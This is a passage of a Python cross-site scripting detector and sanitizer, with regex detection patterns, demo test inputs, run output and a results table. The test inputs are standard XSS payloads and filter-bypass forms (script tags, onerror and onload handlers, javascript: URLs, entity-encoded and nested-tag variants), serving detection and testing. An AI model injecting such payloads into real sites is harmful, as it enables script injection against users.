    def _analyze_js_context(self, text):
        """Analyze JavaScript context vulnerabilities"""
        import re
        rules = []
        risks = []
        
        if '+' in text or 'eval' in text.lower():
            rules.append({
                'name': 'JS String Manipulation',
                'description': 'Potential JS injection through string manipulation',
                'risk': RiskLevel.HIGH,
                'attack_type': 'dom'
            })
            risks.append(RiskLevel.HIGH)
        
        return {'rules': rules, 'risks': risks}

    def _analyze_url_context(self, text):
        """Analyze URL context vulnerabilities"""
        rules = []
        risks = []
        
        if 'javascript:' in text.lower():
            rules.append({
                'name': 'JavaScript in URL',
                'description': 'JavaScript protocol in URL context',
                'risk': RiskLevel.CRITICAL,
                'attack_type': 'bypass'
            })
            risks.append(RiskLevel.CRITICAL)
        
        return {'rules': rules, 'risks': risks}

    def _analyze_dom_patterns(self, text):
        """Analyze DOM manipulation patterns"""
        import re
        dom_patterns = [
            r'innerHTML\s*=',
            r'outerHTML\s*=',
            r'document\.write',
            r'\beval\s*\(',
            r"setTimeout\s*\(\s*['\"]",
            r"setInterval\s*\(\s*['\"]",
        ]
        
        found = False
        for pattern in dom_patterns:
            if re.search(pattern, text, re.IGNORECASE):
                found = True
                break
        
        return {'found': found}
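With the parentheses and dots escaped, the sink patterns match as intended; a quick standalone check:

```python
import re

# Corrected sink patterns from _analyze_dom_patterns, exercised standalone
dom_patterns = [
    r'innerHTML\s*=',
    r'document\.write',
    r'\beval\s*\(',
    r"setTimeout\s*\(\s*['\"]",
]

def has_dom_sink(text):
    return any(re.search(p, text, re.IGNORECASE) for p in dom_patterns)

print(has_dom_sink("el.innerHTML = payload"))     # True
print(has_dom_sink("setTimeout('alert(1)', 0)"))  # True
print(has_dom_sink("console.log('hi')"))          # False
```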

    def _calculate_final_risk(self, risk_levels):
        """Calculate the final risk level from multiple detections"""
        if not risk_levels:
            return RiskLevel.SAFE
        
        risk_order = [
            RiskLevel.CRITICAL,
            RiskLevel.HIGH,
            RiskLevel.MEDIUM,
            RiskLevel.LOW,
            RiskLevel.SAFE
        ]
        
        for risk in risk_order:
            if risk in risk_levels:
                return risk
        
        return RiskLevel.SAFE
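The worst-of aggregation above can be sketched with plain strings standing in for the `RiskLevel` enum:

```python
# Plain strings stand in for the RiskLevel enum here.
ORDER = ['critical', 'high', 'medium', 'low', 'safe']

def final_risk(levels):
    if not levels:
        return 'safe'
    # The highest-severity level present wins
    return min(levels, key=ORDER.index)

print(final_risk(['low', 'critical', 'medium']))  # critical
print(final_risk([]))                             # safe
```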

    def _generate_recommendations(self, matched_rules, semantic_analysis, context):
        """Generate security recommendations"""
        recommendations = []

        recommendations.append("Use context-aware output encoding (HTML, JavaScript, URL)")
        recommendations.append("Use Content Security Policy (CSP) headers")

        if context == "html":
            recommendations.append("Sanitize HTML using a trusted library (DOMPurify, Bleach)")
            recommendations.append("Use DOMPurify for HTML sanitization")
            
        elif context == "js":
            recommendations.append("Use JSON.parse() instead of eval()")
            recommendations.append("Avoid innerHTML, use textContent or safe DOM APIs")
            
        elif context == "url":
            recommendations.append("Validate and sanitize all URL parameters")
            recommendations.append("Use URL validation and whitelist allowed protocols")

        attack_types = set()
        for rule in matched_rules:
            if 'attack_type' in rule:
                attack_types.add(rule['attack_type'])
        
        if 'vector' in attack_types:
            recommendations.append("Remove or neutralize all HTML tags")
            recommendations.append("Strip dangerous attributes like event handlers")
            
        if 'bypass' in attack_types:
            recommendations.append("Decode and re-encode input to neutralize obfuscation")
            recommendations.append("Implement multiple layers of validation")
            
        if 'dom' in attack_types:
            recommendations.append("Use safe DOM APIs (textContent, setAttribute)")
            recommendations.append("Avoid using eval() and similar functions")
            recommendations.append("Use DOMPurify for DOM-based XSS prevention")

        critical_rules = [r for r in matched_rules if r['risk'] == RiskLevel.CRITICAL]
        if critical_rules:
            recommendations.append("URGENT: Review and fix input validation immediately")
            recommendations.append("Implement input whitelist validation")
            recommendations.append("Enable CSP with strict policy")

        seen = set()
        unique_recommendations = []
        for rec in recommendations:
            if rec not in seen:
                seen.add(rec)
                unique_recommendations.append(rec)
        
        return unique_recommendations
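The order-preserving deduplication at the end is equivalent to `dict.fromkeys()`, since dicts keep insertion order in Python 3.7+:

```python
recs = ["Use CSP", "Encode output", "Use CSP", "Encode output"]

# dict.fromkeys keeps the first occurrence of each key, in order
unique = list(dict.fromkeys(recs))
print(unique)  # ['Use CSP', 'Encode output']
```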

    def _generate_analysis_report(self, matched_rules, semantic_analysis, context):
        """Generate detailed analysis report"""
        parts = []
        
        parts.append("Context: %s" % context)
        
        if matched_rules:
            critical = [r for r in matched_rules if r['risk'] == RiskLevel.CRITICAL]
            high = [r for r in matched_rules if r['risk'] == RiskLevel.HIGH]
            medium = [r for r in matched_rules if r['risk'] == RiskLevel.MEDIUM]
            low = [r for r in matched_rules if r['risk'] == RiskLevel.LOW]
            
            parts.append("\nRule-based Detection: %d patterns matched" % len(matched_rules))
            
            if critical:
                parts.append("  CRITICAL (%d): %s" % (len(critical), ", ".join([r['name'] for r in critical[:3]])))
            if high:
                parts.append("  HIGH (%d): %s" % (len(high), ", ".join([r['name'] for r in high[:3]])))
            if medium:
                parts.append("  MEDIUM (%d): %s" % (len(medium), ", ".join([r['name'] for r in medium[:3]])))
            if low:
                parts.append("  LOW (%d): %s" % (len(low), ", ".join([r['name'] for r in low[:3]])))
        else:
            parts.append("\nRule-based Detection: No attack patterns detected")

        if semantic_analysis['additional_rules']:
            parts.append("\nSemantic Analysis: %d anomalies" % len(semantic_analysis['additional_rules']))
            for rule in semantic_analysis['additional_rules']:
                parts.append("  - %s: %s" % (rule['name'], rule['description']))
        else:
            parts.append("\nSemantic Analysis: No anomalies detected")

        if semantic_analysis.get('attack_types'):
            parts.append("\nAttack Types: %s" % ", ".join(semantic_analysis['attack_types']))

        return "\n".join(parts)


class XSSProtector:
    """
    XSS Protector with sanitization capabilities
    """
    
    def __init__(self):
        self.detector = XSSDetector()
        self._init_replacement_rules()

    def _init_replacement_rules(self):
        """Initialize sanitization replacement rules"""
        import re
        self.replacement_rules = [
            (re.compile(r'<script[^>]*>.*?</script>', re.IGNORECASE | re.DOTALL), '&lt;script&gt;...&lt;/script&gt;'),
            (re.compile(r'<script[^>]*/?>', re.IGNORECASE), '&lt;script&gt;'),
            (re.compile(r"\s*on\w+\s*=\s*[\"']?[^\"']*[\"']?", re.IGNORECASE), ''),
            (re.compile(r'javascript\s*:', re.IGNORECASE), 'javascript blocked:'),
            (re.compile(r'<iframe[^>]*>.*?</iframe>', re.IGNORECASE | re.DOTALL), '&lt;iframe&gt;'),
            (re.compile(r'<(object|embed|applet)[^>]*>', re.IGNORECASE), '&lt;object/embed/applet&gt;'),
            (re.compile(r'<svg[^>]*>.*?</svg>', re.IGNORECASE | re.DOTALL), '&lt;svg&gt;'),
            (re.compile(r'data\s*:\s*text/html', re.IGNORECASE), 'data:text/html blocked'),
            (re.compile(r'vbscript\s*:', re.IGNORECASE), 'vbscript blocked:'),
            (re.compile(r'expression\s*\(', re.IGNORECASE), 'expression blocked('),
            (re.compile(r'<!--.*?-->', re.DOTALL), ''),
        ]
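Two of the rules above, exercised standalone (note the event-handler pattern needs its quote characters escaped to be valid Python):

```python
import re

script_rule = re.compile(r'<script[^>]*>.*?</script>', re.IGNORECASE | re.DOTALL)
handler_rule = re.compile(r"\s*on\w+\s*=\s*[\"']?[^\"']*[\"']?", re.IGNORECASE)

s = "<script>alert(1)</script><img src=x onerror=alert(1)>"
s = script_rule.sub('&lt;script&gt;...&lt;/script&gt;', s)  # neutralize script tags
s = handler_rule.sub('', s)                                 # strip on* handlers
print(s)  # &lt;script&gt;...&lt;/script&gt;<img src=x
```

Note that the unquoted-value branch (`[^\"']*`) is greedy and here also consumes the trailing `>`, which is why the sanitized `<img` tag loses its closing bracket.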

    def sanitize_input(self, user_input, context="general"):
        """Sanitize input by removing or encoding dangerous content"""
        sanitized = user_input
        
        for pattern, replacement in self.replacement_rules:
            sanitized = pattern.sub(replacement, sanitized)
        
        if context == "html":
            sanitized = self._sanitize_html(sanitized)
        elif context == "attribute":
            sanitized = self._sanitize_attribute(sanitized)
        elif context == "javascript":
            sanitized = self._sanitize_javascript(sanitized)
        elif context == "url":
            sanitized = self._sanitize_url(sanitized)
        
        return sanitized

    def _sanitize_html(self, text):
        """Sanitize for HTML context"""
        # '&' must be encoded first, otherwise the entities produced by the
        # other replacements get double-encoded (e.g. '&lt;' -> '&amp;lt;')
        dangerous_chars = [
            ('&', '&amp;'),
            ('<', '&lt;'),
            ('>', '&gt;'),
            ('"', '&quot;'),
            ("'", '&#x27;'),
            ('/', '&#x2F;')
        ]
        
        result = text
        for char, encoded in dangerous_chars:
            result = result.replace(char, encoded)
        
        return result
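The order of these replacements matters: encoding `&` after the other characters re-encodes the entities they just produced. A minimal comparison:

```python
def escape_amp_last(t):
    # '&' handled last: earlier entities get re-encoded
    for c, e in [('<', '&lt;'), ('>', '&gt;'), ('&', '&amp;')]:
        t = t.replace(c, e)
    return t

def escape_amp_first(t):
    # '&' handled first: single, correct encoding
    for c, e in [('&', '&amp;'), ('<', '&lt;'), ('>', '&gt;')]:
        t = t.replace(c, e)
    return t

print(escape_amp_last('<b>'))   # &amp;lt;b&amp;gt;  (double-encoded)
print(escape_amp_first('<b>'))  # &lt;b&gt;
```

The double-encoded `&amp;lt;...` strings in the sanitization demo output below are exactly this effect.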

    def _sanitize_attribute(self, text):
        """Sanitize for HTML attribute context"""
        # _sanitize_html already encodes both quote characters
        return self._sanitize_html(text)

    def _sanitize_javascript(self, text):
        """Sanitize for JavaScript string context"""
        return text.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")

    def _sanitize_url(self, text):
        """Sanitize for URL context"""
        try:
            from urllib.parse import quote  # Python 3
        except ImportError:
            from urllib import quote  # Python 2
        return quote(text, safe='')
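With `safe=''`, `urllib.parse.quote` percent-encodes every character outside the unreserved set, including `:` and `/`, which defangs protocol-based payloads:

```python
from urllib.parse import quote, unquote

encoded = quote("javascript:alert(1)", safe='')
print(encoded)           # javascript%3Aalert%281%29
print(unquote(encoded))  # javascript:alert(1)
```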

    def validate_and_sanitize(self, user_input, context="general"):
        """Validate and sanitize input"""
        result = self.detector.detect(user_input, context)
        
        if result.is_xss:
            sanitized = self.sanitize_input(user_input, context)
            result.sanitized_input = sanitized
            return True, sanitized, result
        
        return False, user_input, result

    def check_safety(self, user_input, context="general"):
        """Check input safety without sanitization"""
        return self.detector.detect(user_input, context)


def demo():
    """Demonstration of XSS detection and protection"""
    print("=" * 70)
    print("XSS Detection and Protection System Demo")
    print("=" * 70)

    protector = XSSProtector()

    test_cases = [
        ("<script>alert('XSS')</script>", "html", "Basic script injection"),
        ("<img src=x onerror=alert('XSS')>", "html", "Image onerror event"),
        ("<svg onload=alert('XSS')>", "html", "SVG onload event"),
        ("<scr<script>ipt>alert(1)</scr<script>ipt>", "html", "Nested script bypass"),
        ("<img src=x onerror=alert(1)>", "html", "Event handler bypass"),
        ("javascript:alert(1)", "url", "JavaScript protocol"),
        ("<iframe src='javascript:alert(1)'>", "html", "Iframe with JS protocol"),
        ("<input type='text' value='' onfocus='alert(1)'>", "html", "Stored XSS vector"),
        ("<script>document.write('<img src=x onerror=alert(1)>')</script>", "html", "DOM-based XSS"),
        ("eval('alert(1)')", "javascript", "Eval injection"),
        ("<img src=x onerror=&#97;lert(1)>", "html", "HTML entity encoding"),
        (r"<script>\u0061lert(1)</script>", "html", "Unicode escape"),  # raw string keeps the literal backslash
        ("<div style='background:url(javascript:alert(1))'>", "html", "CSS JavaScript"),
        ("Hello World", "html", "Normal text"),
        ("<p>Hello</p>", "html", "Simple paragraph"),
        ("https://example.com", "url", "Safe URL"),
    ]

    for user_input, context, description in test_cases:
        print("%s" % "="*70)
        print("Test: %s" % description)
        print("Context: %s" % context)
        display_input = user_input[:60] + '...' if len(user_input) > 60 else user_input
        print("Input: %s" % display_input)
        print("-" * 70)

        result = protector.check_safety(user_input, context)

        print("XSS Detected: %s" % ('YES' if result.is_xss else 'NO'))
        print("Risk Level: %s" % result.risk_level)
        
        if result.matched_patterns:
            print("Patterns: %s" % ", ".join(result.matched_patterns[:3]))
        
        if result.attack_types:
            print("Attack Types: %s" % ", ".join(result.attack_types))
        
        print("Analysis:")
        print(result.analysis_details)

    print("%s" % "="*70)
    print("Input Sanitization Demo")
    print("=" * 70)

    malicious_input = "<script>alert('XSS')</script><img src=x onerror=alert(1)>"
    is_detected, sanitized, result = protector.validate_and_sanitize(malicious_input, "html")

    print("\nOriginal: %s" % malicious_input)
    print("XSS Detected: %s" % is_detected)
    print("Sanitized: %s" % sanitized)
    print("Risk Level: %s" % result.risk_level)


if __name__ == "__main__":
    demo()

Run output:
======================================================================
XSS Detection and Protection System Demo
======================================================================
======================================================================
Test: Basic script injection
Context: html
Input: <script>alert('XSS')</script>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Dangerous Tag Usage
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (2): Script Tag Injection, Script Tag Self-Closing
  HIGH (1): Dangerous Tag Usage

Semantic Analysis: 1 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script

Attack Types: vector
======================================================================
Test: Image onerror event
Context: html
Input: <img src=x onerror=alert('XSS')>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Img onerror, Event Handler Detection
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection

Semantic Analysis: 1 anomalies
  - Event Handler Detection: Found event handlers: onerror

Attack Types: vector
======================================================================
Test: SVG onload event
Context: html
Input: <svg onload=alert('XSS')>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, SVG onload Event, Unbalanced HTML Tags
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 5 patterns matched
  CRITICAL (2): Event Handler on*, Event Handler Detection
  HIGH (2): SVG onload Event, Dangerous Tag Usage
  MEDIUM (1): Unbalanced HTML Tags

Semantic Analysis: 3 anomalies
  - Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
  - Dangerous Tag Usage: Found dangerous tags: svg
  - Event Handler Detection: Found event handlers: onload

Attack Types: bypass, vector, vector
======================================================================
Test: Nested script bypass
Context: html
Input: <scr<script>ipt>alert(1)</scr<script>ipt>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Self-Closing, Dangerous Tag Usage
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 2 patterns matched
  CRITICAL (1): Script Tag Self-Closing
  HIGH (1): Dangerous Tag Usage

Semantic Analysis: 1 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script

Attack Types: vector
======================================================================
Test: Event handler bypass
Context: html
Input: <img src=x onerror=alert(1)>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Img onerror, Event Handler Detection
Attack Types: vector
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection

Semantic Analysis: 1 anomalies
  - Event Handler Detection: Found event handlers: onerror

Attack Types: vector
======================================================================
Test: JavaScript protocol
Context: url
Input: javascript:alert(1)
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, Dangerous Protocol Handler, JavaScript in URL
Attack Types: vector, bypass
Analysis:
Context: url

Rule-based Detection: 3 patterns matched
  CRITICAL (3): JavaScript Protocol, Dangerous Protocol Handler, JavaScript in URL

Semantic Analysis: 2 anomalies
  - Dangerous Protocol Handler: Found dangerous protocols: javascript:
  - JavaScript in URL: JavaScript protocol in URL context

Attack Types: bypass
======================================================================
Test: Iframe with JS protocol
Context: html
Input: <iframe src='javascript:alert(1)'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, Iframe Injection, Iframe with JavaScript
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 6 patterns matched
  CRITICAL (3): JavaScript Protocol, Iframe with JavaScript, Dangerous Protocol Handler
  HIGH (2): Iframe Injection, Dangerous Tag Usage
  MEDIUM (1): Unbalanced HTML Tags

Semantic Analysis: 3 anomalies
  - Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
  - Dangerous Tag Usage: Found dangerous tags: iframe
  - Dangerous Protocol Handler: Found dangerous protocols: javascript:

Attack Types: bypass, vector, bypass
======================================================================
Test: Stored XSS vector
Context: html
Input: <input type='text' value='' onfocus='alert(1)'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, Unbalanced HTML Tags, Dangerous Tag Usage
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 4 patterns matched
  CRITICAL (2): Event Handler on*, Event Handler Detection
  HIGH (1): Dangerous Tag Usage
  MEDIUM (1): Unbalanced HTML Tags

Semantic Analysis: 3 anomalies
  - Unbalanced HTML Tags: Detected potentially malicious unbalanced tags
  - Dangerous Tag Usage: Found dangerous tags: input
  - Event Handler Detection: Found event handlers: onfocus

Attack Types: bypass, vector, vector
======================================================================
Test: DOM-based XSS
Context: html
Input: <script>document.write('<img src=x onerror=alert(1)>')</scri...
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Event Handler on*
Attack Types: vector, dom
Analysis:
Context: html

Rule-based Detection: 8 patterns matched
  CRITICAL (5): Script Tag Injection, Script Tag Self-Closing, Event Handler on*
  HIGH (3): Document Write, Dangerous Tag Usage, DOM Manipulation Pattern

Semantic Analysis: 3 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script
  - Event Handler Detection: Found event handlers: onerror
  - DOM Manipulation Pattern: Found potential DOM manipulation

Attack Types: vector, vector, dom
======================================================================
Test: Eval injection
Context: javascript
Input: eval('alert(1)')
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: high
Patterns: Eval Usage, DOM Manipulation Pattern
Attack Types: dom
Analysis:
Context: javascript

Rule-based Detection: 2 patterns matched
  HIGH (2): Eval Usage, DOM Manipulation Pattern

Semantic Analysis: 1 anomalies
  - DOM Manipulation Pattern: Found potential DOM manipulation

Attack Types: dom
======================================================================
Test: HTML entity encoding
Context: html
Input: <img src=x onerror=&#97;lert(1)>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Event Handler on*, HTML Entity Encoding, Img onerror
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 5 patterns matched
  CRITICAL (3): Event Handler on*, Img onerror, Event Handler Detection
  MEDIUM (2): HTML Entity Encoding, Encoding Obfuscation

Semantic Analysis: 2 anomalies
  - Event Handler Detection: Found event handlers: onerror
  - Encoding Obfuscation: Found encoding: HTML Entity

Attack Types: vector, bypass
======================================================================
Test: Unicode escape
Context: html
Input: <script>\u0061lert(1)</script>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: Script Tag Injection, Script Tag Self-Closing, Unicode Escape
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 5 patterns matched
  CRITICAL (2): Script Tag Injection, Script Tag Self-Closing
  HIGH (1): Dangerous Tag Usage
  MEDIUM (2): Unicode Escape, Encoding Obfuscation

Semantic Analysis: 2 anomalies
  - Dangerous Tag Usage: Found dangerous tags: script
  - Encoding Obfuscation: Found encoding: Unicode

Attack Types: vector, bypass
======================================================================
Test: CSS JavaScript
Context: html
Input: <div style='background:url(javascript:alert(1))'>
----------------------------------------------------------------------
XSS Detected: YES
Risk Level: critical
Patterns: JavaScript Protocol, CSS Expression, Dangerous Protocol Handler
Attack Types: vector, bypass
Analysis:
Context: html

Rule-based Detection: 3 patterns matched
  CRITICAL (2): JavaScript Protocol, Dangerous Protocol Handler
  HIGH (1): CSS Expression

Semantic Analysis: 1 anomalies
  - Dangerous Protocol Handler: Found dangerous protocols: javascript:

Attack Types: bypass
======================================================================
Test: Normal text
Context: html
Input: Hello World
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: html

Rule-based Detection: No attack patterns detected

Semantic Analysis: No anomalies detected
======================================================================
Test: Simple paragraph
Context: html
Input: <p>Hello</p>
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: html

Rule-based Detection: No attack patterns detected

Semantic Analysis: No anomalies detected
======================================================================
Test: Safe URL
Context: url
Input: https://example.com
----------------------------------------------------------------------
XSS Detected: NO
Risk Level: safe
Analysis:
Context: url

Rule-based Detection: No attack patterns detected

Semantic Analysis: No anomalies detected
======================================================================
Input Sanitization Demo
======================================================================

Original: <script>alert('XSS')</script><img src=x onerror=alert(1)>
XSS Detected: True
Sanitized: &amp;lt;script&amp;gt;...&amp;lt;&amp;#x2F;script&amp;gt;&amp;lt;img src=x
Risk Level: critical
| # | Test case | Input (abridged) | Detected | Risk level | Attack types |
|---|-----------|------------------|----------|------------|--------------|
| 1 | Basic script injection | `<script>alert('XSS')</script>` | YES | critical | vector |
| 2 | Image onerror event | `<img src=x onerror=alert('XSS')>` | YES | critical | vector |
| 3 | SVG onload event | `<svg onload=alert('XSS')>` | YES | critical | vector, bypass |
| 4 | Nested script bypass | `<scr<script>ipt>alert(1)</scr<script>ipt>` | YES | critical | vector |
| 5 | Event handler bypass | `<img src=x onerror=alert(1)>` | YES | critical | vector |
| 6 | JavaScript protocol | `javascript:alert(1)` | YES | critical | vector, bypass |
| 7 | Iframe with JS protocol | `<iframe src='javascript:alert(1)'>` | YES | critical | vector, bypass |
| 8 | Stored XSS vector | `<input type='text' value='' onfocus='alert(1)'>` | YES | critical | vector, bypass |
| 9 | DOM-based XSS | `<script>document.write('<img src=x onerror=alert(1)>')</scri...` | YES | critical | vector, dom |
| 10 | Eval injection | `eval('alert(1)')` | YES | high | dom |
| 11 | HTML entity encoding | `<img src=x onerror=&#97;lert(1)>` | YES | critical | vector, bypass |
| 12 | Unicode escape | `<script>\u0061lert(1)</script>` | YES | critical | vector, bypass |
| 13 | JavaScript in CSS | `<div style='background:url(javascript:alert(1))'>` | YES | critical | vector, bypass |
| 14 | Normal text | `Hello World` | NO | safe | - |
| 15 | Simple paragraph | `<p>Hello</p>` | NO | safe | - |
| 16 | Safe URL | `https://example.com` | NO | safe | - |

Notes:

  • The "Input" column is abridged; see the raw output above for the full strings.
  • In "Attack types", `vector` denotes a conventional reflected/stored XSS vector, `bypass` a filter-evasion technique, and `dom` DOM-based XSS.
  • Risk levels are taken directly from the `critical` and `high` values in the raw output.

For beginner-level XSS practice ranges, see the following article, or head straight to CTFhub:

www.cnblogs.com/L00kback/p/…